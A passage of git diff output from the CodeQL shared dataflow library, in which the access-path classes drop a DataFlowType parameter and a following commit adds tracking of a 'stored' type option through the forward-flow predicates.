- private DataFlowType t; - AccessPathApproxConsNil() { this = TConsNil(c, t) } + AccessPathApproxConsNil() { this = TConsNil(c) } - private string ppTyp() { result = t.toString() and result != "" } - - override string toString() { - // The `concat` becomes "" if `ppTyp` has no result. - result = "[" + c.toString() + "]" + concat(" : " + this.ppTyp()) - } + override string toString() { result = "[" + c.toString() + "]" } override Content getHead() { result = c } @@ -4075,18 +4057,15 @@ module MakeImpl Lang> { override AccessPathFront getFront() { result = TFrontHead(c) } - override predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail) { - head = c and typ = t and tail = TNil() - } + override predicate isCons(Content head, AccessPathApprox tail) { head = c and tail = TNil() } } private class AccessPathApproxConsCons extends AccessPathApproxCons, TConsCons { private Content c1; - private DataFlowType t; private Content c2; private int len; - AccessPathApproxConsCons() { this = TConsCons(c1, t, c2, len) } + AccessPathApproxConsCons() { this = TConsCons(c1, c2, len) } override string toString() { if len = 2 @@ -4100,14 +4079,13 @@ module MakeImpl Lang> { override AccessPathFront getFront() { result = TFrontHead(c1) } - override predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail) { + override predicate isCons(Content head, AccessPathApprox tail) { head = c1 and - typ = t and ( - tail = TConsCons(c2, _, _, len - 1) + tail = TConsCons(c2, _, len - 1) or len = 2 and - tail = TConsNil(c2, _) + tail = TConsNil(c2) or tail = TCons1(c2, len - 1) ) @@ -4132,20 +4110,20 @@ module MakeImpl Lang> { override AccessPathFront getFront() { result = TFrontHead(c) } - override predicate isCons(Content head, DataFlowType typ, AccessPathApprox tail) { + override predicate isCons(Content head, AccessPathApprox tail) { head = c and ( - exists(Content c2 | Stage4::consCand(c, typ, TFrontHead(c2)) | - tail = TConsCons(c2, _, _, len - 1) + exists(Content c2 | Stage4::consCand(c, TFrontHead(c2)) | + tail = TConsCons(c2, _, len - 1) or len = 2 and - tail = TConsNil(c2, _) + tail = TConsNil(c2) or tail = TCons1(c2, len - 1) ) or len = 1 and - Stage4::consCand(c, typ, TFrontNil()) and + Stage4::consCand(c, TFrontNil()) and tail = TNil() ) } @@ -4177,8 +4155,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { result = t } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { result.isCons(c, t, tail) } + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result.isCons(c, tail) } class ApHeadContent = Content; @@ -4234,8 +4212,8 @@ module MakeImpl Lang> { private module Stage5 = MkStage::Stage; pragma[nomagic] - private predicate stage5ConsCand(Content c, DataFlowType t, AccessPathFront apf, int len) { - Stage5::consCand(c, t, any(AccessPathApprox ap | ap.getFront() = apf and ap.len() = len - 1)) + private predicate stage5ConsCand(Content c, AccessPathFront apf, int len) { + Stage5::consCand(c, any(AccessPathApprox ap | ap.getFront() = apf and ap.len() = len - 1)) } /** @@ -4245,7 +4223,7 @@ module MakeImpl Lang> { exists(Content c, int len | c = apa.getHead() and len = apa.len() and - result = strictcount(DataFlowType t, AccessPathFront apf | stage5ConsCand(c, t, apf, len)) + result = strictcount(AccessPathFront apf | stage5ConsCand(c, apf, len)) ) } @@ -4270,10 +4248,10 @@ module MakeImpl Lang> { ) } - private predicate hasTail(AccessPathApprox apa, DataFlowType t, AccessPathApprox tail) { + private predicate hasTail(AccessPathApprox apa, AccessPathApprox tail) { exists(Content head | - apa.isCons(head, t, tail) and - Stage5::consCand(head, t, tail) + apa.isCons(head, tail) and + Stage5::consCand(head, tail) ) } @@ -4281,7 +4259,7 @@ module MakeImpl Lang> { forceHighPrecision(apa.getHead()) or exists(Content c2 | - apa = TConsCons(_, _, c2, _) and + apa = TConsCons(_, c2, _) and forceHighPrecision(c2) ) } @@ -4326,25 +4304,24 @@ module MakeImpl Lang> { private int countPotentialAps(AccessPathApprox apa) { apa instanceof AccessPathApproxNil and result = 1 or - result = - strictsum(DataFlowType t, AccessPathApprox tail | hasTail(apa, t, tail) | countAps(tail)) + result = strictsum(AccessPathApprox tail | hasTail(apa, tail) | countAps(tail)) } private newtype TAccessPath = TAccessPathNil() or - TAccessPathCons(Content head, DataFlowType t, AccessPath tail) { + TAccessPathCons(Content head, AccessPath tail) { exists(AccessPathApproxCons apa | not evalUnfold(apa, false) and head = apa.getHead() and - hasTail(apa, t, tail.getApprox()) + hasTail(apa, tail.getApprox()) ) } or - TAccessPathCons2(Content head1, DataFlowType t, Content head2, int len) { + TAccessPathCons2(Content head1, Content head2, int len) { exists(AccessPathApproxCons apa, AccessPathApprox tail | evalUnfold(apa, false) and not expensiveLen1to2unfolding(apa) and apa.len() = len and - hasTail(apa, t, tail) and + hasTail(apa, tail) and head1 = apa.getHead() and head2 = tail.getHead() ) @@ -4372,8 +4349,8 @@ module MakeImpl Lang> { Typ getTyp(DataFlowType t) { result = t } - bindingset[c, t, tail] - Ap apCons(Content c, Typ t, Ap tail) { result.isCons(c, t, tail) } + bindingset[c, tail] + Ap apCons(Content c, Ap tail) { result.isCons(c, tail) } class ApHeadContent = Content; @@ -4431,18 +4408,18 @@ module MakeImpl Lang> { module Stage6 = MkStage::Stage; /** - * A list of `Content`s where nested tails are also paired with a - * `DataFlowType`. If data flows from a source to a given node with a given - * `AccessPath`, this indicates the sequence of dereference operations needed - * to get from the value in the node to the tracked object. The - * `DataFlowType`s indicate the types of the stored values. + * A list of `Content`s. + * + * If data flows from a source to a given node with a given `AccessPath`, + * this indicates the sequence of dereference operations needed to get from + * the value in the node to the tracked object. */ private class AccessPath extends TAccessPath { /** Gets the head of this access path, if any. */ abstract Content getHead(); - /** Holds if this is a representation of `head` followed by the `typ,tail` pair. */ - abstract predicate isCons(Content head, DataFlowType typ, AccessPath tail); + /** Holds if this is a representation of `head` followed by `tail`. */ + abstract predicate isCons(Content head, AccessPath tail); /** Gets the front of this access path. */ abstract AccessPathFront getFront(); @@ -4460,7 +4437,7 @@ module MakeImpl Lang> { private class AccessPathNil extends AccessPath, TAccessPathNil { override Content getHead() { none() } - override predicate isCons(Content head, DataFlowType typ, AccessPath tail) { none() } + override predicate isCons(Content head, AccessPath tail) { none() } override AccessPathFrontNil getFront() { result = TFrontNil() } @@ -4473,39 +4450,34 @@ module MakeImpl Lang> { private class AccessPathCons extends AccessPath, TAccessPathCons { private Content head_; - private DataFlowType t; private AccessPath tail_; - AccessPathCons() { this = TAccessPathCons(head_, t, tail_) } + AccessPathCons() { this = TAccessPathCons(head_, tail_) } override Content getHead() { result = head_ } - override predicate isCons(Content head, DataFlowType typ, AccessPath tail) { - head = head_ and typ = t and tail = tail_ - } + override predicate isCons(Content head, AccessPath tail) { head = head_ and tail = tail_ } override AccessPathFrontHead getFront() { result = TFrontHead(head_) } override AccessPathApproxCons getApprox() { - result = TConsNil(head_, t) and tail_ = TAccessPathNil() + result = TConsNil(head_) and tail_ = TAccessPathNil() or - result = TConsCons(head_, t, tail_.getHead(), this.length()) + result = TConsCons(head_, tail_.getHead(), this.length()) or result = TCons1(head_, this.length()) } override int length() { result = 1 + tail_.length() } - private string ppTyp() { result = t.toString() and result != "" } - private string toStringImpl(boolean needsSuffix) { tail_ = TAccessPathNil() and needsSuffix = false and - result = head_.toString() + "]" + concat(" : " + this.ppTyp()) + result = head_.toString() + "]" or result = head_ + ", " + tail_.(AccessPathCons).toStringImpl(needsSuffix) or - exists(Content c2, Content c3, int len | tail_ = TAccessPathCons2(c2, _, c3, len) | + exists(Content c2, Content c3, int len | tail_ = TAccessPathCons2(c2, c3, len) | result = head_ + ", " + c2 + ", " + c3 + ", ... (" and len > 2 and needsSuffix = true or result = head_ + ", " + c2 + ", " + c3 + "]" and len = 2 and needsSuffix = false @@ -4527,18 +4499,16 @@ module MakeImpl Lang> { private class AccessPathCons2 extends AccessPath, TAccessPathCons2 { private Content head1; - private DataFlowType t; private Content head2; private int len; - AccessPathCons2() { this = TAccessPathCons2(head1, t, head2, len) } + AccessPathCons2() { this = TAccessPathCons2(head1, head2, len) } override Content getHead() { result = head1 } - override predicate isCons(Content head, DataFlowType typ, AccessPath tail) { + override predicate isCons(Content head, AccessPath tail) { head = head1 and - typ = t and - Stage5::consCand(head1, t, tail.getApprox()) and + Stage5::consCand(head1, tail.getApprox()) and tail.getHead() = head2 and tail.length() = len - 1 } @@ -4546,7 +4516,7 @@ module MakeImpl Lang> { override AccessPathFrontHead getFront() { result = TFrontHead(head1) } override AccessPathApproxCons getApprox() { - result = TConsCons(head1, t, head2, len) or + result = TConsCons(head1, head2, len) or result = TCons1(head1, len) } @@ -4569,9 +4539,9 @@ module MakeImpl Lang> { override Content getHead() { result = head_ } - override predicate isCons(Content head, DataFlowType typ, AccessPath tail) { + override predicate isCons(Content head, AccessPath tail) { head = head_ and - Stage5::consCand(head_, typ, tail.getApprox()) and + Stage5::consCand(head_, tail.getApprox()) and tail.length() = len - 1 } From 4933e803cf14b43768063b577609c146859c7805 Mon Sep 17 00:00:00 2001 From: Anders Schack-Mulligen Date: Mon, 2 Dec 2024 14:14:30 +0100 Subject: [PATCH 0774/1267] Dataflow: Track stored type. --- .../codeql/dataflow/internal/DataFlowImpl.qll | 374 ++++++++++-------- .../dataflow/internal/DataFlowImplCommon.qll | 2 + 2 files changed, 219 insertions(+), 157 deletions(-) diff --git a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll index 084d9976f9f..1076957db5e 100644 --- a/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll +++ b/shared/dataflow/codeql/dataflow/internal/DataFlowImpl.qll @@ -1419,6 +1419,10 @@ module MakeImpl Lang> { module Stage implements StageSig { import Param + private module TypOption = Option; + + private class TypOption = TypOption::Option; + /* Begin: Stage logic. */ pragma[nomagic] private Typ getNodeTyp(NodeEx node) { @@ -1472,16 +1476,17 @@ module MakeImpl Lang> { */ pragma[nomagic] additional predicate fwdFlow( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, + TypOption stored ) { - fwdFlow1(node, state, cc, summaryCtx, _, t, ap, apa) + fwdFlow1(node, state, cc, summaryCtx, _, t, ap, apa, stored) } private predicate fwdFlow1( NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t0, Typ t, Ap ap, - ApApprox apa + ApApprox apa, TypOption stored ) { - fwdFlow0(node, state, cc, summaryCtx, t0, ap, apa) and + fwdFlow0(node, state, cc, summaryCtx, t0, ap, apa, stored) and PrevStage::revFlow(node, state, apa) and filter(node, state, t0, ap, t) and ( @@ -1496,17 +1501,19 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlow0( - NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa + NodeEx node, FlowState state, Cc cc, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, + TypOption stored ) { sourceNode(node, state) and (if hasSourceCallCtx() then cc = ccSomeCall() else cc = ccNone()) and summaryCtx = TSummaryCtxNone() and t = getNodeTyp(node) and ap instanceof ApNil and - apa = getApprox(ap) + apa = getApprox(ap) and + stored.isNone() or exists(NodeEx mid, FlowState state0, Typ t0, LocalCc localCc | - fwdFlow(mid, state0, cc, summaryCtx, t0, ap, apa) and + fwdFlow(mid, state0, cc, summaryCtx, t0, ap, apa, stored) and localCc = getLocalCc(cc) | localStep(mid, state0, node, state, true, _, localCc, _) and @@ -1516,23 +1523,23 @@ module MakeImpl Lang> { ap instanceof ApNil ) or - fwdFlowJump(node, state, t, ap, apa) and + fwdFlowJump(node, state, t, ap, apa, stored) and cc = ccNone() and summaryCtx = TSummaryCtxNone() or // store exists(Content c, Ap ap0 | - fwdFlowStore(_, _, ap0, c, t, node, state, cc, summaryCtx) and + fwdFlowStore(_, _, ap0, _, c, t, stored, node, state, cc, summaryCtx) and ap = apCons(c, ap0) and apa = getApprox(ap) ) or // read - fwdFlowRead(_, _, _, _, node, t, ap, state, cc, summaryCtx) and + fwdFlowRead(_, _, _, _, _, node, t, ap, stored, state, cc, summaryCtx) and apa = getApprox(ap) or // flow into a callable without summary context - fwdFlowInNoFlowThrough(node, apa, state, cc, t, ap) and + fwdFlowInNoFlowThrough(node, apa, state, cc, t, ap, stored) and summaryCtx = TSummaryCtxNone() and // When the call contexts of source and sink needs to match then there's // never any reason to enter a callable except to find a summary. See also @@ -1540,18 +1547,18 @@ module MakeImpl Lang> { not Config::getAFeature() instanceof FeatureEqualSourceSinkCallContext or // flow into a callable with summary context (non-linear recursion) - fwdFlowInFlowThrough(node, apa, state, cc, t, ap) and - summaryCtx = TSummaryCtxSome(node, state, t, ap) + fwdFlowInFlowThrough(node, apa, state, cc, t, ap, stored) and + summaryCtx = TSummaryCtxSome(node, state, t, ap, stored) or // flow out of a callable - fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, apa) + fwdFlowOut(_, _, node, state, cc, summaryCtx, t, ap, apa, stored) or // flow through a callable exists( DataFlowCall call, CcCall ccc, RetNodeEx ret, boolean allowsFieldFlow, ApApprox innerArgApa | - fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, ret, innerArgApa) and + fwdFlowThrough(call, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, innerArgApa) and flowThroughOutOfCall(call, ccc, ret, node, allowsFieldFlow, innerArgApa, apa) and not inBarrier(node, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -1560,8 +1567,8 @@ module MakeImpl Lang> { private newtype TSummaryCtx = TSummaryCtxNone() or - TSummaryCtxSome(ParamNodeEx p, FlowState state, Typ t, Ap ap) { - fwdFlowInFlowThrough(p, _, state, _, t, ap) + TSummaryCtxSome(ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored) { + fwdFlowInFlowThrough(p, _, state, _, t, ap, stored) } /** @@ -1589,33 +1596,44 @@ module MakeImpl Lang> { private FlowState state; private Typ t; private Ap ap; + private TypOption stored; - SummaryCtxSome() { this = TSummaryCtxSome(p, state, t, ap) } + SummaryCtxSome() { this = TSummaryCtxSome(p, state, t, ap, stored) } ParamNodeEx getParamNode() { result = p } private string ppTyp() { result = t.toString() and result != "" } - override string toString() { result = p + concat(" : " + this.ppTyp()) + " " + ap } + private string ppStored() { + exists(string ppt | ppt = stored.toString() | + if stored.isNone() or ppt = "" then result = "" else result = " : " + ppt + ) + } + + override string toString() { + result = p + concat(" : " + this.ppTyp()) + " " + ap + this.ppStored() + } override Location getLocation() { result = p.getLocation() } } - private predicate fwdFlowJump(NodeEx node, FlowState state, Typ t, Ap ap, ApApprox apa) { + private predicate fwdFlowJump( + NodeEx node, FlowState state, Typ t, Ap ap, ApApprox apa, TypOption stored + ) { exists(NodeEx mid | - fwdFlow(mid, state, _, _, t, ap, apa) and + fwdFlow(mid, state, _, _, t, ap, apa, stored) and jumpStepEx(mid, node) ) or exists(NodeEx mid | - fwdFlow(mid, state, _, _, _, ap, apa) and + fwdFlow(mid, state, _, _, _, ap, apa, stored) and additionalJumpStep(mid, node, _) and t = getNodeTyp(node) and ap instanceof ApNil ) or exists(NodeEx mid, FlowState state0 | - fwdFlow(mid, state0, _, _, _, ap, apa) and + fwdFlow(mid, state0, _, _, _, ap, apa, stored) and additionalJumpStateStep(mid, state0, node, state, _) and t = getNodeTyp(node) and ap instanceof ApNil @@ -1624,18 +1642,19 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowStore( - NodeEx node1, Typ t1, Ap ap1, Content c, Typ t2, NodeEx node2, FlowState state, Cc cc, - SummaryCtx summaryCtx + NodeEx node1, Typ t1, Ap ap1, TypOption stored1, Content c, Typ t2, TypOption stored2, + NodeEx node2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { exists(DataFlowType contentType, DataFlowType containerType, ApApprox apa1 | - fwdFlow(node1, state, cc, summaryCtx, t1, ap1, apa1) and + fwdFlow(node1, state, cc, summaryCtx, t1, ap1, apa1, stored1) and not outBarrier(node1, state) and not inBarrier(node2, state) and PrevStage::storeStepCand(node1, apa1, c, node2, contentType, containerType) and t2 = getTyp(containerType) and // We need to typecheck stores here, since reverse flow through a getter // might have a different type here compared to inside the getter. - typecheck(t1, getTyp(contentType)) + typecheck(t1, getTyp(contentType)) and + if ap1 instanceof ApNil then stored2.asSome() = t1 else stored2 = stored1 ) } @@ -1646,7 +1665,7 @@ module MakeImpl Lang> { */ pragma[nomagic] private predicate fwdFlowConsCand(Typ t2, Ap cons, Content c, Typ t1, Ap tail) { - fwdFlowStore(_, t1, tail, c, t2, _, _, _, _) and + fwdFlowStore(_, t1, tail, _, c, t2, _, _, _, _, _) and cons = apCons(c, tail) } @@ -1664,11 +1683,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRead0( - Typ t, Ap ap, Content c, NodeEx node1, NodeEx node2, FlowState state, Cc cc, - SummaryCtx summaryCtx + Typ t, Ap ap, TypOption stored, Content c, NodeEx node1, NodeEx node2, FlowState state, + Cc cc, SummaryCtx summaryCtx ) { exists(ApHeadContent apc | - fwdFlow(node1, state, cc, summaryCtx, t, ap, _) and + fwdFlow(node1, state, cc, summaryCtx, t, ap, _, stored) and not outBarrier(node1, state) and not inBarrier(node2, state) and apc = getHeadContent(ap) and @@ -1678,19 +1697,28 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRead( - NodeEx node1, Typ t1, Ap ap1, Content c, NodeEx node2, Typ t2, Ap ap2, FlowState state, - Cc cc, SummaryCtx summaryCtx + NodeEx node1, Typ t1, Ap ap1, TypOption stored1, Content c, NodeEx node2, Typ t2, Ap ap2, + TypOption stored2, FlowState state, Cc cc, SummaryCtx summaryCtx ) { - fwdFlowRead0(t1, ap1, c, node1, node2, state, cc, summaryCtx) and - fwdFlowConsCand(t1, ap1, c, t2, ap2) + exists(Typ ct1, Typ ct2 | + fwdFlowRead0(t1, ap1, stored1, c, node1, node2, state, cc, summaryCtx) and + fwdFlowConsCand(ct1, ap1, c, ct2, ap2) and + typecheck(t1, ct1) and + typecheck(t2, ct2) and + if ap2 instanceof ApNil + then stored2.isNone() and stored1.asSome() = t2 + else ( + stored2 = stored1 and t2 = getNodeTyp(node2) + ) + ) } pragma[nomagic] private predicate fwdFlowIntoArg( ArgNodeEx arg, FlowState state, Cc outercc, SummaryCtx summaryCtx, Typ t, Ap ap, - boolean emptyAp, ApApprox apa, boolean cc + boolean emptyAp, ApApprox apa, TypOption stored, boolean cc ) { - fwdFlow(arg, state, outercc, summaryCtx, t, ap, apa) and + fwdFlow(arg, state, outercc, summaryCtx, t, ap, apa, stored) and (if instanceofCcCall(outercc) then cc = true else cc = false) and if ap instanceof ApNil then emptyAp = true else emptyAp = false } @@ -1797,9 +1825,9 @@ module MakeImpl Lang> { private predicate fwdFlowInCand( DataFlowCall call, ArgNodeEx arg, FlowState state, Cc outercc, DataFlowCallable inner, ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, boolean emptyAp, ApApprox apa, - boolean cc + TypOption stored, boolean cc ) { - fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, cc) and + fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and ( inner = viableImplCallContextReducedInlineLate(call, arg, outercc) or @@ -1813,10 +1841,11 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowInCandTypeFlowDisabled( DataFlowCall call, ArgNodeEx arg, FlowState state, Cc outercc, DataFlowCallable inner, - ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, boolean cc + ParamNodeEx p, SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, + boolean cc ) { not enableTypeFlow() and - fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, apa, cc) + fwdFlowInCand(call, arg, state, outercc, inner, p, summaryCtx, t, ap, _, apa, stored, cc) } pragma[nomagic] @@ -1825,7 +1854,7 @@ module MakeImpl Lang> { boolean emptyAp, ApApprox apa, boolean cc ) { enableTypeFlow() and - fwdFlowInCand(call, arg, _, outercc, inner, p, _, _, _, emptyAp, apa, cc) + fwdFlowInCand(call, arg, _, outercc, inner, p, _, _, _, emptyAp, apa, _, cc) } pragma[nomagic] @@ -1851,16 +1880,16 @@ module MakeImpl Lang> { predicate fwdFlowIn( DataFlowCall call, ArgNodeEx arg, DataFlowCallable inner, ParamNodeEx p, FlowState state, Cc outercc, CcCall innercc, SummaryCtx summaryCtx, Typ t, Ap ap, - ApApprox apa, boolean cc + ApApprox apa, TypOption stored, boolean cc ) { // type flow disabled: linear recursion fwdFlowInCandTypeFlowDisabled(call, arg, state, outercc, inner, p, summaryCtx, t, ap, - apa, cc) and + apa, stored, cc) and fwdFlowInValidEdgeTypeFlowDisabled(call, inner, innercc, pragma[only_bind_into](cc)) or // type flow enabled: non-linear recursion exists(boolean emptyAp | - fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, cc) and + fwdFlowIntoArg(arg, state, outercc, summaryCtx, t, ap, emptyAp, apa, stored, cc) and fwdFlowInValidEdgeTypeFlowEnabled(call, arg, outercc, inner, p, innercc, emptyAp, apa, cc) ) @@ -1873,9 +1902,10 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInNoFlowThrough( - ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap + ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap, + TypOption stored ) { - FwdFlowInNoThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, _) + FwdFlowInNoThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, stored, _) } private predicate top() { any() } @@ -1884,9 +1914,10 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowInFlowThrough( - ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap + ParamNodeEx p, ApApprox apa, FlowState state, CcCall innercc, Typ t, Ap ap, + TypOption stored ) { - FwdFlowInThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, _) + FwdFlowInThrough::fwdFlowIn(_, _, _, p, state, _, innercc, _, t, ap, apa, stored, _) } pragma[nomagic] @@ -1928,11 +1959,11 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowIntoRet( RetNodeEx ret, FlowState state, CcNoCall cc, SummaryCtx summaryCtx, Typ t, Ap ap, - ApApprox apa + ApApprox apa, TypOption stored ) { instanceofCcNoCall(cc) and not outBarrier(ret, state) and - fwdFlow(ret, state, cc, summaryCtx, t, ap, apa) + fwdFlow(ret, state, cc, summaryCtx, t, ap, apa, stored) } pragma[nomagic] @@ -1940,7 +1971,7 @@ module MakeImpl Lang> { DataFlowCall call, RetNodeEx ret, CcNoCall innercc, DataFlowCallable inner, NodeEx out, ApApprox apa, boolean allowsFieldFlow ) { - fwdFlowIntoRet(ret, _, innercc, _, _, _, apa) and + fwdFlowIntoRet(ret, _, innercc, _, _, _, apa, _) and inner = ret.getEnclosingCallable() and ( call = viableImplCallContextReducedReverseInlineLate(inner, innercc) and @@ -1964,10 +1995,10 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowOut( DataFlowCall call, DataFlowCallable inner, NodeEx out, FlowState state, CcNoCall outercc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa + SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored ) { exists(RetNodeEx ret, CcNoCall innercc, boolean allowsFieldFlow | - fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa) and + fwdFlowIntoRet(ret, state, innercc, summaryCtx, t, ap, apa, stored) and fwdFlowOutValidEdge(call, ret, innercc, inner, out, outercc, apa, allowsFieldFlow) and not inBarrier(out, state) and if allowsFieldFlow = false then ap instanceof ApNil else any() @@ -1984,47 +2015,52 @@ module MakeImpl Lang> { pragma[nomagic] private predicate dataFlowTakenCallEdgeIn0( DataFlowCall call, DataFlowCallable c, ParamNodeEx p, FlowState state, CcCall innercc, - Typ t, Ap ap, boolean cc + Typ t, Ap ap, TypOption stored, boolean cc ) { - FwdFlowInNoThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, cc) + FwdFlowInNoThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, stored, cc) or - FwdFlowInThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, cc) + FwdFlowInThrough::fwdFlowIn(call, _, c, p, state, _, innercc, _, t, ap, _, stored, cc) } pragma[nomagic] - private predicate fwdFlow1Param(ParamNodeEx p, FlowState state, CcCall cc, Typ t0, Ap ap) { + private predicate fwdFlow1Param( + ParamNodeEx p, FlowState state, CcCall cc, Typ t0, Ap ap, TypOption stored + ) { instanceofCcCall(cc) and - fwdFlow1(p, state, cc, _, t0, _, ap, _) + fwdFlow1(p, state, cc, _, t0, _, ap, _, stored) } pragma[nomagic] predicate dataFlowTakenCallEdgeIn(DataFlowCall call, DataFlowCallable c, boolean cc) { - exists(ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap | - dataFlowTakenCallEdgeIn0(call, c, p, state, innercc, t, ap, cc) and - fwdFlow1Param(p, state, innercc, t, ap) + exists(ParamNodeEx p, FlowState state, CcCall innercc, Typ t, Ap ap, TypOption stored | + dataFlowTakenCallEdgeIn0(call, c, p, state, innercc, t, ap, stored, cc) and + fwdFlow1Param(p, state, innercc, t, ap, stored) ) } pragma[nomagic] private predicate dataFlowTakenCallEdgeOut0( - DataFlowCall call, DataFlowCallable c, NodeEx node, FlowState state, Cc cc, Typ t, Ap ap + DataFlowCall call, DataFlowCallable c, NodeEx node, FlowState state, Cc cc, Typ t, + Ap ap, TypOption stored ) { - fwdFlowOut(call, c, node, state, cc, _, t, ap, _) + fwdFlowOut(call, c, node, state, cc, _, t, ap, _, stored) } pragma[nomagic] - private predicate fwdFlow1Out(NodeEx node, FlowState state, Cc cc, Typ t0, Ap ap) { + private predicate fwdFlow1Out( + NodeEx node, FlowState state, Cc cc, Typ t0, Ap ap, TypOption stored + ) { exists(ApApprox apa | - fwdFlow1(node, state, cc, _, t0, _, ap, apa) and + fwdFlow1(node, state, cc, _, t0, _, ap, apa, stored) and PrevStage::callEdgeReturn(_, _, _, _, node, _, apa) ) } pragma[nomagic] predicate dataFlowTakenCallEdgeOut(DataFlowCall call, DataFlowCallable c) { - exists(NodeEx node, FlowState state, Cc cc, Typ t, Ap ap | - dataFlowTakenCallEdgeOut0(call, c, node, state, cc, t, ap) and - fwdFlow1Out(node, state, cc, t, ap) + exists(NodeEx node, FlowState state, Cc cc, Typ t, Ap ap, TypOption stored | + dataFlowTakenCallEdgeOut0(call, c, node, state, cc, t, ap, stored) and + fwdFlow1Out(node, state, cc, t, ap, stored) ) } @@ -2038,7 +2074,7 @@ module MakeImpl Lang> { or exists(NodeEx node | cc = false and - fwdFlowJump(node, _, _, _, _) and + fwdFlowJump(node, _, _, _, _, _) and c = node.getEnclosingCallable() ) } @@ -2057,14 +2093,14 @@ module MakeImpl Lang> { pragma[nomagic] private predicate fwdFlowRetFromArg( RetNodeEx ret, FlowState state, CcCall ccc, SummaryCtxSome summaryCtx, ApApprox argApa, - Typ t, Ap ap, ApApprox apa + Typ t, Ap ap, ApApprox apa, TypOption stored ) { exists(ReturnKindExt kind, ParamNodeEx p, Ap argAp | instanceofCcCall(ccc) and fwdFlow(pragma[only_bind_into](ret), state, ccc, summaryCtx, t, ap, - pragma[only_bind_into](apa)) and + pragma[only_bind_into](apa), stored) and summaryCtx = - TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp)) and + TSummaryCtxSome(pragma[only_bind_into](p), _, _, pragma[only_bind_into](argAp), _) and not outBarrier(ret, state) and kind = ret.getKind() and parameterFlowThroughAllowed(p, kind) and @@ -2076,27 +2112,29 @@ module MakeImpl Lang> { pragma[inline] private predicate fwdFlowThrough0( DataFlowCall call, ArgNodeEx arg, Cc cc, FlowState state, CcCall ccc, - SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, RetNodeEx ret, + SummaryCtx summaryCtx, Typ t, Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, SummaryCtxSome innerSummaryCtx, ApApprox innerArgApa ) { - fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, innerArgApa, t, ap, apa) and + fwdFlowRetFromArg(ret, state, ccc, innerSummaryCtx, innerArgApa, t, ap, apa, stored) and fwdFlowIsEntered(call, arg, cc, ccc, summaryCtx, innerSummaryCtx) } pragma[nomagic] private predicate fwdFlowThrough( DataFlowCall call, Cc cc, FlowState state, CcCall ccc, SummaryCtx summaryCtx, Typ t, - Ap ap, ApApprox apa, RetNodeEx ret, ApApprox innerArgApa + Ap ap, ApApprox apa, TypOption stored, RetNodeEx ret, ApApprox innerArgApa ) { - fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, ret, _, innerArgApa) + fwdFlowThrough0(call, _, cc, state, ccc, summaryCtx, t, ap, apa, stored, ret, _, + innerArgApa) } pragma[nomagic] private predicate fwdFlowIsEntered0( DataFlowCall call, ArgNodeEx arg, Cc cc, CcCall innerCc, SummaryCtx summaryCtx, - ParamNodeEx p, FlowState state, Typ t, Ap ap + ParamNodeEx p, FlowState state, Typ t, Ap ap, TypOption stored ) { - FwdFlowInThrough::fwdFlowIn(call, arg, _, p, state, cc, innerCc, summaryCtx, t, ap, _, _) + FwdFlowInThrough::fwdFlowIn(call, arg, _, p, state, cc, innerCc, summaryCtx, t, ap, _, + stored, _) } /** @@ -2108,22 +2146,22 @@ module 